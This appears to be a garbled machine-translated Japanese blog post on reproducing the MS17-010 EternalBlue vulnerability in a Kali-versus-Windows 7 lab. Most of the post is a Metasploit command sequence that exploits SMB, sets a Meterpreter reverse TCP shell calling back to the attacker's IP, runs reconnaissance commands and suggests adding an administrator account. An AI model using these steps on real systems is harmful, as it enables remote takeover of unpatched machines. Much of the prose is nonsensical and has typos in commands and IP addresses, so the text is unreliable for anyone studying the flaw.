Ms17-010永遠ブルーの脆弱性の再現

Ms17-010永遠ブルーの脆弱性の再現

0x00が脆弱性を紹介します

永遠ブルーは2017年4月14日、「永遠ブルー」の最高機関システムを得ることができますWindowsのSMBシステムの脆弱性を利用しての夜を指し
無法の要素の変換により、2017年5月12日「永遠ブルー」恐喝ウイルス生産wannacry複数の大学のキャンパスネットワークでは、大規模な企業ネットワークや政府機関、プライベートネットワークのトリックで、恐喝賃金の高い身代金は、ファイルを復元復号化します。

0x01の脆弱性原理

永遠ブルーフォーミュラワン組織は、その攻撃で抜け穴は、ターゲットシステム上の攻撃者が任意のコードを実行できる可能性がSMBサービスの脆弱性のためのフレームワークを利用しています。

0x02のバージョンに影響します

Windowsのの現在知られている影響を受けるバージョンは、これらに限定されないが:
WindowsNTは、
Windows2000の、
Windows XPでは、
Windows 2003では、
Windows Vistaでは、
Windows 7は、
Windows 8の、
Windows 2008の、
Windows 2008のR2、
Windows Serverの2012 SP0。

0x03の脆弱性補修

いつもではない添付ファイルを開くドキュメント、RTFおよびその他のサフィックス;イントラネットMicrosoftは2017年3月14日にリリースMS17-010のパッチの修正の脆弱性「永遠ブルー」攻撃、Windowsシステムのパッチを更新してくださいましたパッチがインストールされた後、必ずパスワードの変更は、ネットワーク操作を完了すると、あなたはバグ修正「永遠ブルー」ツールのバグ修正をダウンロードすることができ、同じアカウントを使用して存在し、コンピュータではなくメイクの上、できるだけ早くマシンコードの場合にパスワードを変更してください

0x04の環境の脆弱性

攻撃:カリ-Linuxの-2019.4-vmwareの -amd64(IP:192.168.139.153)
ドローン:Windows 7のX64(IP:192.168.139.140 )

0x05の再現性のある脆弱性

[msfconsole] ----- MSFを開始
[serarch ms17_010] ----テンプレートライブラリを表示し
、[利用補助/スキャナ/ SMB / smb_ms17_010] - 抜け穴がある場合スキャンホストは見に
セット- [設定のrhosts 192.1683.139.140は]アドレスIPスキャンホスト
[活用]は-攻撃し始めた
[使用は、Windows / SMB / /活用 - ms17_010_eternalblue] 攻撃モジュールへの使用を
[表示オプション]を----閲覧パラメータを設定する必要がある
[設定のrhosts 192.168.139.140] -攻撃されたホストを設定しますIPアドレス
[セットlhostsは192.168.139.153] -攻撃者のIPアドレスを設定
[設定のスレッド512] -攻撃者のIPアドレスを設定し
、[設定ペイロードの窓/ x64の/ meterpreter / reverse_tcp] - バウンスにマシンを設定する
[悪用] -攻撃を始めます

ここに画像を挿入説明ここに画像を挿入説明
ここに画像を挿入説明ここに画像を挿入説明

[シェル]
[whami]
[システム情報]
[IPCONFIG]
次に、あなたは、スーパー管理者グループへのパスワードの追加]を変更するためにユーザーを追加することができます

ここに画像を挿入説明ここに画像を挿入説明ここに画像を挿入説明

公開された223元の記事 ウォン称賛32 ビュー70000 +

おすすめ

転載: blog.csdn.net/qq_41901122/article/details/103832915
おすすめ